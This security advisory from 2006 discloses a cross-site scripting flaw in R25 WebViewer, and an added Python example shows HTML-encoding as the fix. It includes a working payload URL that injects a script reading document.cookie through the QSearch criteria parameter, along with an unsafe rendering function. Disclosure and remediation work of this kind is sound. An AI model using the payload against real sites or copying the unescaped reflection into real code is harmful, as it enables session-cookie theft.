R25 WebViewer versions 3.2 and below are susceptible to cross-site scripting attacks.
R25 XSS Vulnerability
=====================
Discovered By: Matthew Benenati <dk.mak0[AT]gmail[DOT]com>
Release Date: 3/3/2006
Vendor: CollegeNET
Versions: <=3.2
Severity: Medium

About
-----
R25 delivers the first campus-wide class and event scheduling software to unify all users on a single database, provide a completely customizable environment for each, and tap the power of the Internet for mass communication and e-commerce revenue opportunities.

Example
-------
R25 WebViewer is susceptible to cross-site scripting through the criteria value of the QSearch request:
http://<VICTIM>/wv3/wv3_servlet/urd/run/wv_event.QSearch?searchon=0,findby=1,criteria=%22%3C/div%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
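
The fix for this class of bug is to HTML-encode the criteria value before it is written back into the page. The following is an added example, not CollegeNET's code and not part of the original advisory: it parses the comma-separated QSearch query shown above and contrasts a raw reflection with an encoded one. The host name, the function names and the HTML template are assumptions; the template (a quoted attribute inside a div) is only inferred from the shape of the request above.

```python
import html
from urllib.parse import urlsplit, unquote

# Request from the advisory, with a constructed host in place of <VICTIM>.
SAMPLE_URL = (
    "http://r25.example.edu/wv3/wv3_servlet/urd/run/wv_event.QSearch"
    "?searchon=0,findby=1,criteria=%22%3C/div%3E%3Cscript%3E"
    "alert(document.cookie)%3C/script%3E"
)

PARAM_NAMES = ("searchon", "findby", "criteria")


def parse_qsearch(url):
    """Split the comma-separated QSearch query into decoded name/value pairs."""
    query = urlsplit(url).query
    params = {}
    # criteria comes last and may itself contain commas, so split at most twice.
    for field in query.split(",", len(PARAM_NAMES) - 1):
        name, _, value = field.partition("=")
        if name in PARAM_NAMES:
            params[name] = unquote(value)
    return params


# Hypothetical template: the search term is echoed into a quoted attribute.
TEMPLATE = '<div><input name="criteria" value="{}"></div>'


def render_unsafe(criteria):
    """Reflect the value as received; markup in the value becomes page markup."""
    return TEMPLATE.format(criteria)


def render_safe(criteria):
    """Encode &, <, >, and both quote characters so the value stays data."""
    return TEMPLATE.format(html.escape(criteria, quote=True))


if __name__ == "__main__":
    term = parse_qsearch(SAMPLE_URL)["criteria"]
    print("decoded :", term)
    print("unsafe  :", render_unsafe(term))
    print("encoded :", render_safe(term))
```
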